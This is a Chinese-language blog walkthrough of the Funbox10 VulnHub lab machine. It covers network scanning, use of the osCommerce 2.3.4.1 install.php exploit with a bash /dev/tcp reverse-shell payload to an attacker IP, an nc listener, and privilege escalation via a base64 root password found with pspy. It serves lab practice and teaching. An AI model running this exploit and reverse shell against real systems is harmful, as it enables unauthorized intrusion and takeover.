靶机实战：Funbox10

重生之我在网络当保安

已于 2024-06-17 09:20:09 修改

阅读量2.1k

点赞数 61

文章标签： github web安全学习笔记

于 2024-06-14 20:00:00 首次发布

本文链接：https://blog.csdn.net/CHAsichuan/article/details/139669730

版权

Funbox10靶机

靶机下载地址：Vulnerable By Design ~ VulnHub
靶机难度：中等。
打开靶机，让靶机和kali处于同一个网段。

一、信息收集

1.扫描IP

arp-scan -l

扫描内网端口
在这里插入图片描述

10.9.23.39端口出现的次数最多，打开确定一下，发现确定是10.9.23.39

nmap扫描同样扫到了

nmap -sS 10.9.23.39

在这里插入图片描述

2.查看开放的端口：

nmap -sV -p- 10.9.23.39

扫描出来发现开放了22、25、80、110、143端口

22：SSH 远程连接

25：SMTP （Simple Mail Transfer Protocol， 简单邮件传输协议 ）服务器所开放，主要用于发送邮件。

80：网页端口

110：110端口，是为 POP3（邮件协议 3）服务开放的，主要用于接受邮件。（25端口和110端口是邮件常用端口）

143：IMAP协议，和POP3协议一样是用来接收邮件的，它是面向用户的，接收邮件以及很方便的操作服务器上的邮件。

在这里插入图片描述

3.敏感目录扫描

dirb hhtp://10.9.23.39/

在这里插入图片描述

4.网页信息收集

其他三个敏感目录进不去，全是404

在这里插入图片描述
只有catalog可以访问，那我们重点就看下这里，根据版本，我们找到了他有命令执行！

通过网页可知该网页所用的服务是邮件传输协议版本号v2.3.4.1

二、漏洞利用

1.搜索一些有没有版本漏洞

searchsploit osCommerce 2.3.4.1

在这里插入图片描述

找到了有三个可利用的漏洞程序，下载44374试一下

searchsploit -m 44374

在这里插入图片描述

2.下载漏洞

下载好了，打开查看一下

vim 44374.py

在这里插入图片描述

3.编译漏洞文件

根据提示，修改网页的目标地址和本地监听的地址

base url = "http://10.9.23.39/catalog/
target url = "http://10.9.23.3/catalog/install/install.php?step=4"
pavload += 'shell exec("bash -c \'bash -i >& /dev/tcp/10.9.23.40/7777 0>&1\'");'

在这里插入图片描述

4.启用漏洞文件

python 44374.py

在这里插入图片描述

5.开启端口反弹

nc -nvlp 7777

在这里插入图片描述

三、提权

1.切换到bashshell

python -c 'import pty;pty.spawn("/bin/bash")'

ls之后，用户下面并没有东西，sudo也不能提权。

2.使用pspy命令工具，监控Linux进程。

pspy是一个命令行工具，它可以在没有Root权限的情况下，监控Linux进程。黑客可以利用它来查看其他用户的计划任务工作(cron job)等。

3.使用find -perm有没有可以利用的sudo提权

使用命令：find / -perm -4000 -exec ls -al {} \; 2>/dev/null 发现没有可以利用的sudo提权

在这里插入图片描述

四.下载pspy64s

1.github下载

下载地址

https://github.com/DominicBreuker/pspy

2.下载到kali，靶机从kali下载

下载好后把pspy64下到kali的home里面，然后开80端口让靶机从kali下载

python3 -m http.server 80

kali开网页端口：

在这里插入图片描述

靶机进网页端口下载：

在这里插入图片描述

3.为pspy赋权限

chmod 777 pspy64然后运行 pspy64 发现了一个 UID=1000 cron.sh 进行查看

chmod 777 pspy64

在这里插入图片描述

发现了一个 UID=1000 cron.sh 的，点进去进行查看

/usr/share/doc/examples/cron.sh

在这里插入图片描述

查看一下这个路径

cat /usr/share/doc/examples/cron.sh

发现了一个base64密码

在这里插入图片描述

LXUgcm9vdCAtcCByZnZiZ3QhIQ==

[base64解密网站](Base64在线加密解密-在线Base64加密解密工具-Base64编码解码工具 (jsons.cn))

在这里插入图片描述

密码：rfvbgt!!

4.su root登录

使用su - root的时候报错了，此时我们就需要进入/tmp目录下，把之前输的"import"简化命令给输出到asdf.py自定义python文件中，然后使用python运行，就可以su root了。

在这里插入图片描述

夺旗成功！！！-+

在这里插入图片描述

五、总结

一、扫描
扫描工具：namp、arp-scan
扫描端口：namp
扫描敏感目录：dirb
二、漏洞搜索
搜索漏洞：searchsploit
三、漏洞利用
对下载好的漏洞文件编译、安装
对文件赋权（chmod）然后利用
四、运行pspy64，发现了路径
五、解密base64。得到root密码。登录root成功。